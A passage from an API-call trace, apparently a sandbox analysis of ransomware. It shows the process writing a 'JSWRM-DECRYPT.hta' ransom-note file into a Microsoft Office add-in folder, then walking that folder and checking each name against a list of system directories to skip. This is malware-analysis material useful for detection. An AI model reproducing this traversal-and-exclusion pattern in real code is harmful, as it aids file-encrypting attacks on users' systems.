(HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0123.775] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e228 [0123.775] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0123.775] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\de\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\de\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0123.776] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.776] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0123.777] CloseHandle (hObject=0x314) returned 1 [0123.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e228 | out: hHeap=0x1e0000) returned 1 [0123.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ffa8 | out: hHeap=0x1e0000) returned 1 [0123.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0123.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0123.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0123.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0123.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0123.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e688 [0123.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0123.778] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\de\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\de\\jswrm-decrypt.hta")) returned 0x20 [0123.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0123.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0123.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0123.778] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\de\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6354def, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x133f40a9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x406f512c, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x231d40 [0123.778] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0123.778] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6354def, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x133f40a9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x406f512c, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0123.778] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0123.778] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0123.778] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x44a38de, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x44a38de, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1341a2e5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc4eb8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AdHocReportingExcelClient.dll", cAlternateFileName="ADHOCR~1.DLL")) returned 1 [0123.778] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2=".") returned 1 [0123.778] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="..") returned 1 [0123.778] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="...") returned 1 [0123.778] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="windows") returned -1 [0123.778] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="recovery") returned -1 [0123.778] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="perflogs") returned -1 [0123.778] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="documents and settings") returned -1 [0123.778] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.778] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="system volume information") returned -1 [0123.778] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="msocache") returned -1 [0123.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0123.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0123.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0123.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x240f48, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0123.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0123.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0123.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0123.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0123.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x2410d8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0123.779] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0123.779] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b650 [0123.779] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0123.779] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0123.779] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0123.779] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x406f512c, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x406f512c, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x406f512c, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0123.779] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0123.779] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0123.779] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0123.779] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0123.779] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0123.779] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0123.779] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0123.779] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0123.779] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0123.779] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0123.779] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.779] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.779] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0123.779] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2413d0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.779] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.779] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.779] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.779] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0123.779] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.779] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.779] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0123.779] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b650 | out: hHeap=0x1e0000) returned 1 [0123.779] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0123.780] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0123.780] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x37869c8, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x37869c8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x37acc11, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x14060, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.PowerBI.Diagnostics.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0123.780] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2=".") returned 1 [0123.780] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="..") returned 1 [0123.780] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="...") returned 1 [0123.780] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="windows") returned -1 [0123.780] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="recovery") returned -1 [0123.780] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="perflogs") returned -1 [0123.780] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="documents and settings") returned 1 [0123.780] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.780] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="system volume information") returned -1 [0123.780] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="msocache") returned -1 [0123.780] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232f58 [0123.780] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.780] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.780] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d0a0, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.780] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232f58 | out: hHeap=0x1e0000) returned 1 [0123.780] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2331c8 [0123.780] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.780] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.780] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.780] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2331c8 | out: hHeap=0x1e0000) returned 1 [0123.780] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0123.780] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0123.780] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.780] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.780] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6354def, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf6354def, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6354def, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x12ad8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0123.780] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2=".") returned 1 [0123.780] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="..") returned 1 [0123.780] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="...") returned 1 [0123.780] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="windows") returned -1 [0123.781] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="recovery") returned -1 [0123.781] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="perflogs") returned -1 [0123.781] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="documents and settings") returned 1 [0123.781] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.781] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="system volume information") returned -1 [0123.781] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="msocache") returned -1 [0123.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225190 [0123.781] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0123.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0123.781] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d920, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0123.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225190 | out: hHeap=0x1e0000) returned 1 [0123.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0123.781] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0123.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0123.781] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dde8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0123.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0123.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23ef08 [0123.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0123.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0123.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0123.781] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x91adba5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x91adba5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x91d3da7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x50b0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0123.781] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2=".") returned 1 [0123.781] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="..") returned 1 [0123.781] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="...") returned 1 [0123.781] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="windows") returned -1 [0123.781] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="recovery") returned -1 [0123.781] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="perflogs") returned -1 [0123.781] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="documents and settings") returned 1 [0123.781] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.781] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="system volume information") returned -1 [0123.781] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="msocache") returned -1 [0123.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 [0123.781] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0123.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0123.781] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d698, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0123.782] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0123.782] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224e60 [0123.782] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0123.782] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0123.782] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d920, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0123.782] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224e60 | out: hHeap=0x1e0000) returned 1 [0123.782] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f030 [0123.782] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ef08 | out: hHeap=0x1e0000) returned 1 [0123.782] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0123.782] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0123.782] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x133f40a9, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x133f40a9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1341a2e5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x502f9, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.de.xap", cAlternateFileName="POWERV~1.XAP")) returned 1 [0123.782] lstrcmpiW (lpString1="PowerViewRes.de.xap", lpString2=".") returned 1 [0123.782] lstrcmpiW (lpString1="PowerViewRes.de.xap", lpString2="..") returned 1 [0123.782] lstrcmpiW (lpString1="PowerViewRes.de.xap", lpString2="...") returned 1 [0123.782] lstrcmpiW (lpString1="PowerViewRes.de.xap", lpString2="windows") returned -1 [0123.782] lstrcmpiW (lpString1="PowerViewRes.de.xap", lpString2="recovery") returned -1 [0123.782] lstrcmpiW (lpString1="PowerViewRes.de.xap", lpString2="perflogs") returned 1 [0123.782] lstrcmpiW (lpString1="PowerViewRes.de.xap", lpString2="documents and settings") returned 1 [0123.782] lstrcmpiW (lpString1="PowerViewRes.de.xap", lpString2="$RECYCLE.BIN") returned 1 [0123.782] lstrcmpiW (lpString1="PowerViewRes.de.xap", lpString2="system volume information") returned -1 [0123.782] lstrcmpiW (lpString1="PowerViewRes.de.xap", lpString2="msocache") returned 1 [0123.782] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.782] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.de.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0123.782] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0123.782] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.de.xap", cchWideChar=19, lpMultiByteStr=0x241268, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.de.xap", lpUsedDefaultChar=0x0) returned 19 [0123.782] 